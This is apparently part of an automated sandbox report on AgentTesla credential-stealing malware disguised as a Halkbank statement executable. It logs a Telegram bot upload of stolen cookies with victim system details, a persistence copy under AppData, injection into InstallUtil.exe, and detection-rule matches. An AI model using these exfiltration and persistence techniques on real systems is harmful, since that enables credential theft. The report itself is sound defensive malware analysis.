                                                      2022-05-14 13:17:54 UTC1239OUTData Raw: 1a 43 6a ef 66 e7 7d 47 8d 18 a4 7a ce 54 89 4c d5 14 c9 2c 50 b3 3e 98 8c 45 3a 93 12 ae 7e 30 61 41 6c cf 51 10 db 53 10 08 d4 38 8b bd 61 1f 87 b4 6c 2f d9 43 77 a5 ad 66 65 25 c7 f4 99 b4 9c 5f 0a b2 98 7f 28 da c9 95 78 3d 1e 6e b8 6e 66 15 65 08 53 ec e8 f8 cb fa b1 73 aa ed 95 11 ed 88 b5 bf 1a 8e b7 be 12 2e e8 58 be 3b 1b e3 91 0d e1 78 17 5e 2f 75 05 f1 fd 61 28 a8 1e a8 72 14 7b 43 9e f9 ba 65 b7 20 8b f6 d5 de db 2f b2 d7 b7 db 8a bc f0 15 12 7e 15 2e 59 37 00 00 00 00 00 00 00 00 00 3c 95 56 f0 7c a8 7c e6 bc 46 d5 33 86 c2 b4 9e 34 91 07 ed 43 17 3d 2b 36 3c e3 e0 7d e5 0f 53 65 1c ef 2f cf 64 14 43 a6 4c 61 39 5a 23 2e 46 f6 fe 7f 12 09 93 c2 0d e1 ca bf fd 5f 00 00 00 00 00 00 00 00 00 b0 20 1f 1f e2 e6 39 05 e0 97 f0 3e 2e ff ec 28 e5 fd
                                                      Data Ascii: Cjf}GzTL,P>E:~0aAlQS8al/Cwfe%_(x=nnfeSs.X;x^/ua(r{Ce /~.Y7<V||F34C=+6<}Se/dCLa9Z#.F_ 9>.(
                                                      2022-05-14 13:17:55 UTC1240INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 13:17:54 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 646
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":489,"from":{"id":5351864471,"is_bot":true,"first_name":"Maryland","username":"marymekbot"},"chat":{"id":5388276304,"first_name":"Mary","last_name":"Bethel","username":"marybethel59","type":"private"},"date":1652534274,"document":{"file_name":"user-783875 2022-05-14 03-17-54.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIB6WJ_rAKhHLfibLE0SHm9KYf7GyOTAAJ1DAAC5M8AAVBx-0VW7evAICQE","file_unique_id":"AgADdQwAAuTPAAFQ","file_size":1316},"caption":"New Cookie Recovered!\n\nUser Name: user/783875\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:15:15:38
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe"
                                                      Imagebase:0xe00000
                                                      File size:24576 bytes
                                                      MD5 hash:BEF71F070519AAD800BF09D7D5A7659B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      Target ID:11
                                                      Start time:15:16:09
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                      Imagebase:0xc20000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:12
                                                      Start time:15:16:09
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:13
                                                      Start time:15:16:10
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 20
                                                      Imagebase:0x10e0000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:15
                                                      Start time:15:16:35
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Imagebase:0xe30000
                                                      File size:41064 bytes
                                                      MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.386534863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.386534863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.386867081.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.386867081.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.386199386.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.386199386.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      Target ID:17
                                                      Start time:15:16:46
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
                                                      Imagebase:0x10000
                                                      File size:24576 bytes
                                                      MD5 hash:BEF71F070519AAD800BF09D7D5A7659B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe, Author: Florian Roth
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 39%, ReversingLabs
                                                      Reputation:low

                                                      Target ID:18
                                                      Start time:15:16:55
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
                                                      Imagebase:0x890000
                                                      File size:24576 bytes
                                                      MD5 hash:BEF71F070519AAD800BF09D7D5A7659B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:low

                                                      Target ID:24
                                                      Start time:15:17:23
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                      Imagebase:0xc20000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:25
                                                      Start time:15:17:23
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:27
                                                      Start time:15:17:25
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 20
                                                      Imagebase:0x10e0000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:28
                                                      Start time:15:17:32
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                      Imagebase:0xc20000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:29
                                                      Start time:15:17:32
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:30
                                                      Start time:15:17:32
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 20
                                                      Imagebase:0x10e0000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      No disassembly